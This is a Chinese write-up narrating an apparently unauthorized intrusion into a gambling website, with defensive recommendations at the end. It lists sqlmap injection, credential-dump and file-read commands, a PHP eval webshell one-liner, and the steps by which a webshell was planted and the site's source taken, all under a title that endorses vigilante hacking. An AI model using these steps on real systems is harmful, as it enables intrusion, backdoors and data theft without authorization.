赌博站人人得而诛之
字数 1279 2025-08-05 11:39:40
赌博网站渗透测试技术分析报告
1. 目标发现与初步分析
- 目标类型:棋牌赌博网站
- 初始发现:通过偶然访问发现目标站点
- 技术特点:存在SQL注入漏洞,无安全防护设备
2. SQL注入漏洞利用
2.1 漏洞发现过程
- 在用户名字段后添加单引号(
')导致系统报错 - 通过闭合语句测试确认存在SQL注入漏洞
2.2 使用sqlmap进行自动化注入
sqlmap -u "目标URL" --参数
2.3 获取的数据库信息
current-user: developer@%
select @@BASEDIR: '/usr/'
select USER(): 'developer@121.x.x.x'
select DATABASE(): 'edc'
select SYSTEM_USER(): 'developer@121.x.x.x'
select @@CHARACTER_SETS_DIR: '/usr/share/mysql/charsets/'
select @@CHARACTER_SET_CLIENT: 'utf8'
select @@DATADIR: '/var/lib/mysql/'
select @@CHARACTER_SET_SERVER: 'latin1'
2.4 数据库用户权限分析
- 当前用户权限较低:
developer@% - 获取的其他用户:
'root'@'localhost' 'developer'@'localhost' 'root'@'127.0.0.1' 'syncopy'@'222.xxx.xxx.xxx' 'mlh'@'localhost' 'developer'@'%' 'mlh'@'%' 'edc'@'%' '6hc_nav'@'%'
3. 端口扫描与信息收集
3.1 发现的开放端口
- 80端口:无有效页面
- 888端口:Apache默认首页,泄露绝对路径
/var/www/html/ - 9090端口:赌博站管理登录地址
- 9091端口:赌博站会员登录地址
3.2 目录扫描发现
- 报错页面:提供额外注入点
- info.php文件:泄露服务器信息
4. 权限提升尝试
4.1 数据库root权限获取
- 成功获取数据库root权限
- 当前数据库:
db_test
4.2 文件写入尝试
- 直接SQL语句写入:
select "<?php eval($_POST['x']);?>" into outfile "/var/www/html/25u_ft/1.php"
- 失败原因:不支持堆叠查询
- sqlmap文件写入:
sqlmap --file-write "/localhost/shell.php" --file-dest "/var/www/html/25u_ft/test.php"
- 失败原因:无写入权限
- 文件读取成功:
sqlmap --file-read "/var/www/html/25u_ft/info.php"
5. 后台管理员密码破解
5.1 数据库表结构
- 数据库名:
10fenft - 表名:
g_user - 字段:
g_name,g_password
5.2 使用sqlmap获取凭证
sqlmap -D "10fenft" -T "g_user" -C "g_name,g_password" --dump
5.3 后台登录
- 成功获取管理员凭证并登录后台
- 后台功能有限,无文件上传功能
6. 突破点发现与利用
6.1 域名关联发现
- 通过IP历史解析记录发现关联域名
- 域名指向一个论坛系统
6.2 ThinkPHP框架利用
- 框架版本暴露绝对路径
- 利用已知路径成功写入Webshell
7. 最终渗透成果
7.1 Webshell获取
- 成功上传PHP后门脚本
- 连接方式:通过POST参数执行命令
7.2 源码打包
- 通过Webshell打包网站源码
- 发现多个同类型站点存在相同漏洞
8. 技术总结与安全建议
8.1 漏洞利用链
- SQL注入漏洞发现
- 数据库信息收集
- 管理员凭证获取
- 后台功能受限时的替代方案
- 关联资产发现与利用
- 框架特性利用获取Webshell
8.2 安全防护建议
- 输入过滤:对所有用户输入进行严格过滤
- 最小权限原则:数据库用户应仅具有必要权限
- 错误处理:自定义错误页面,避免泄露系统信息
- 目录权限:限制Web目录的写入权限
- 框架安全:及时更新框架版本,禁用调试信息
- 多因素认证:对管理后台实施更强的认证机制
9. 技术细节补充
9.1 SQL注入防护
- 使用参数化查询(prepared statements)
- 实施白名单输入验证
- 避免直接拼接SQL语句
9.2 文件上传防护
- 限制上传文件类型
- 文件内容检查而非仅扩展名检查
- 上传文件存储在Web根目录外
9.3 服务器加固建议
- 关闭不必要服务端口
- 定期更新系统和应用软件
- 实施严格的访问控制策略
- 日志监控与异常行为检测
本报告仅用于网络安全研究目的,所有技术细节均来自公开信息分析。任何未经授权的渗透测试行为都是非法的。